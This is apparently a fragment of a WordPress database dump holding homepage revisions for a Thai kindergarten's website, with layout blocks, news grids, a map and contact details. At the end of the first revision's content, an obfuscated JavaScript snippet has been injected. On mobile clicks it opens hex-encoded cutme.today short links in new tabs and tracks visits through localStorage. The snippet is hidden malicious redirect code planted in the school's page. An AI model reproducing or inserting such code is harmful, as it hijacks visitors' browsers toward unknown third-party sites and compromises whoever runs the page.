{\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:40:01','2025-06-27 08:40:01','',19,'http://watprato.ssk.in.th/?p=585',0,'revision','',0),
(587,1,'2025-06-27 15:42:19','2025-06-27 08:42:19','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- 